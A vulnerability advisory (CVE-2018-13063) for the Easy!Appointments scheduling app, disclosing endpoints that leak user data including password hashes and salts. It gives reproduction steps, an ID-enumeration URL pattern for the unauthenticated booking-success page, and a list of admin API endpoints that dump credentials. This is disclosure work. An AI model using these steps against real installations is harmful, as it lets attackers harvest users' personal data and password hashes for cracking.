[CVE-2018-13063] Easy!Appointments – Multiple confidential information leakage
Easy!Appointments is a highly customizable web application that offers scheduling management for businesses. We found multiple leaks of confidential user information.Description
Easy!Appointments is a highly customizable web application that offers scheduling management for businesses.
Threat
Without being connected, an attacker can collect users’ information, including hashed passwords and salts.
Expectation
The application should only send strictly necessary information. It should never send hashed passwords.
Vulnerability Type
CVE ID: CVE-2018-13063
Access Vector: network
Security Risk: high
Vulnerability: CWE-200
CVSS Base Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
The Easy!Appointments application has multiple interfaces which leak users’ information, including hashed passwords and salts.
Proof of Concept 1 : Unauthenticated providers’ information leak
Without being authenticated, it is possible to collect provider data.
Steps :
1/ Visit the application (e.g. visit localhost)
2/ Select a service and a provider
3/ Choose an appointment date and time
4/ Fill required information
5/ Search the source code of the page « Your appointment has been successfully registered! » for GlobalVariables
:
var GlobalVariables = {
[...]
'providerData': {
"id": "85",
"first_name": "John",
"last_name": "Doe",
"email": "john@doe.com",
"mobile_number": "",
"phone_number": "0123456789",
"address": "",
"city": "",
"state": "",
[...]
"settings": {
"username": "johndoe",
"password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
"salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
[...]
"google_sync": "0",
"google_token": "",
"google_calendar": "",
"sync_past_days": "5",
"sync_future_days": "5",
"calendar_view": "default"
}
},
6/ The book_success
page can be enumerated to obtain other users’ data. You just need to pass the user ID like in : index.php/appointments/book_success/<ID>
. For instance :http://localhost/index.php/appointments/book_success/63
.
Proof of Concept 2 : Information leakage in the admin interface
In the admin interface, at the user tab, the API leaks hashed passwords and salts.
- User tab, at
index.php/backend/users
(output truncated for the sake of brevity):
var GlobalVariables = {
csrfToken: "7349322823ef8b3ed03a2bcdb17b6001",
baseUrl: "http:\/\/localhost",
dateFormat: "DMY",
admins: [{
"id": "84",
"first_name": "admin",
"last_name": "admin",
"email": "admin@admin.admin",
"mobile_number": "",
"phone_number": "adminn",
"address": "",
"city": "",
"state": "",
"zip_code": "",
"notes": "",
"id_roles": "1",
"settings": {
"username": "admin",
"password": "5c3716a135b95d6f07d6549a7842386915ee14fd9a003c287f74c5588b7f1fea",
"salt": "0b12403b95c62f4aaa75ddaa6f5dcb8e54e3e6fe7b504ca97fd676ddfa70ecae",
"working_plan": "",
"notifications": "0",
"google_sync": "0",
"google_token": "",
"google_calendar": "",
"sync_past_days": "5",
"sync_future_days": "5",
"calendar_view": "default"
}
},
[...]
providers: [{
"id": "85",
"first_name": "John",
"last_name": "Doe",
"email": "john@doe.com",
"mobile_number": "",
"phone_number": "0123456789",
"address": "",
"city": "",
"state": "",
"zip_code": "",
"notes": "",
"id_roles": "2",
"services": ["13"],
"settings": {
"username": "johndoe",
"password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
"salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
[...]
};
-
index.php/backend_api/ajax_filter_admins
(Users > Admins) : dumps admin information including password hashes and salts. -
index.php/backend_api/ajax_filter_providers
(Users > Providers) : dumps provider information including password hashes and salts. -
index.php/backend_api/ajax_filter_secretaries
(Users > Secretaries) : dumps secretary information including password hashes and salts.
Proof of Concept 3 : Information leakage in other interfaces
http://localhost/index.php/backend/settings
: leaks password hash and salt of the current logged user.http://localhost/index.php/backend_api/ajax_get_calendar_appointments
leaks password hash and salt of « John Doe » (Default user).http://localhost/index.php/backend_api/ajax_filter_customers
leaks password hash and salt of « John Doe » (Default user).
Affected versions
Versions 1.3.0 and prior to 1.2.1 – other versions have not been tested.
Solution
Update to a version superior to 1.3.2.
Timeline (dd/mm/yyyy)
- 06/03/2018 : Initial discovery
- 17/04/2018 : Vendor contact
- 17/05/2018 : Vendor technical team acknowledgment
- 15/08/2018 : Vendor submits a private 2.2.16.128 pre-release that, according to our test, did not mitigate the issue.
- 25/10/2019 : Public disclosure
Credits
- Pierrick VERAN, Sysdream (p.veran -at- sysdream -dot- com)